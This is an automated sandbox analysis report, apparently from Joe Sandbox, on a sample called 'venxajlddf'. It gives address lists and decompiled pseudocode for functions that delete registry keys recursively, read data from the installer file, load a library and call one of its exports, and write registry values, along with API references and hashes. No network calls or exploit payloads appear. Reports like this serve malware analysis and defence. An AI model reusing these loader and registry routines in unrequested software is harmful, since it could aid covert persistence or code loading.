0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Strings

printf, xrefs: 00406BB0

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID: printf
API String ID: 0-3524737521
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?), ref: 00402F74

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 73BF1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E73BF1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x73bf506c = _a8;
				 *0x73bf5070 = _a16;
				 *0x73bf5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73bf5048, E73BF1651);
				_push(1); // executed
				_t37 = E73BF1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E73BF243E(_t54);
					}
					_push(_t54);
					E73BF2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E73BF2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E73BF1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E73BF2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E73BF2655();
							_t37 = GlobalFree(E73BF1312(E73BF1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E73BF2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E73BF15DD( *0x73bf5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73BF2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73BF2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E73BF2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x73bf1817
0x73bf1817
0x73bf1817
0x73bf1824
0x73bf182c
0x73bf1839
0x73bf1847
0x73bf184a
0x73bf184c
0x73bf1851
0x73bf1856
0x73bf1978
0x73bf1978
0x73bf185c
0x73bf1860
0x73bf1863
0x73bf1868
0x73bf1869
0x73bf186a
0x73bf1870
0x73bf1876
0x73bf18a6
0x73bf18ad
0x73bf18d1
0x73bf191e
0x73bf191f
0x73bf18d3
0x73bf18d3
0x73bf18d4
0x73bf18dd
0x73bf18de
0x73bf18e8
0x73bf18eb
0x73bf18f0
0x73bf18f7
0x73bf18f7
0x73bf18fd
0x73bf18fe
0x73bf1904
0x73bf190a
0x73bf1917
0x73bf1918
0x73bf191b
0x73bf18af
0x73bf18af
0x73bf18b0
0x73bf18c5
0x73bf18c5
0x73bf1929
0x73bf192c
0x73bf1939
0x73bf1940
0x73bf1948
0x73bf194b
0x73bf194b
0x73bf1948
0x73bf1958
0x73bf1960
0x73bf1965
0x73bf1958
0x73bf196d
0x00000000
0x73bf196f
0x00000000
0x73bf1970
0x73bf196d
0x73bf187a
0x73bf187d
0x73bf189b
0x00000000
0x00000000
0x73bf189e
0x73bf18a3
0x73bf18a3
0x73bf18a5
0x00000000
0x73bf18a5
0x73bf187f
0x73bf1880
0x73bf1888
0x73bf1889
0x00000000
0x73bf1889
0x73bf1882
0x73bf1883
0x73bf1891
0x00000000
0x73bf1891
0x73bf1886
0x00000000
0x00000000
0x00000000
0x73bf1886

APIs

Part of subcall function 73BF1BFF: GlobalFree.KERNEL32(?), ref: 73BF1E74
Part of subcall function 73BF1BFF: GlobalFree.KERNEL32(?), ref: 73BF1E79
Part of subcall function 73BF1BFF: GlobalFree.KERNEL32(?), ref: 73BF1E7E

GlobalFree.KERNEL32(00000000), ref: 73BF18C5
FreeLibrary.KERNEL32(?), ref: 73BF194B
GlobalFree.KERNEL32(00000000), ref: 73BF1970

Part of subcall function 73BF243E: GlobalAlloc.KERNEL32(00000040,?), ref: 73BF246F

Part of subcall function 73BF2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73BF1896,00000000), ref: 73BF28E0

Part of subcall function 73BF1666: wsprintfW.USER32 ref: 73BF1694

Strings

, xrefs: 73BF1951

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 71b50bddab0497c484881d9be113c9c54ab0604ad77bfd2b9186104c1ac59089
Instruction ID: 6eed75667f32b3f6b595f098524f3d61b44651a081c4562a2a43c608a1ccaca9
Opcode Fuzzy Hash: 71b50bddab0497c484881d9be113c9c54ab0604ad77bfd2b9186104c1ac59089
Instruction Fuzzy Hash: 8841B6B5400347ABEB119F34DA84B9537ACEF45310F18B975E90B9E0C6EB78818DCBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x794b
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x15ff49
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						_t19 =  *0x420f00; // 0x3b402
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40f975
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x794b
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x0040347c
0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403523
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNEL32(0000794B,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Strings

printf, xrefs: 004034D2, 0040356D

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: printf
API String ID: 1092082344-3524737521
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, "@4d", 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Strings

@4d, xrefs: 00402156

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: @4d
API String ID: 334405425-2116944484
Opcode ID: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
Opcode Fuzzy Hash: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x40b5f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024e5
0x004024ea
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNEL32 ref: 00402515
RegCloseKey.KERNEL32(?), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

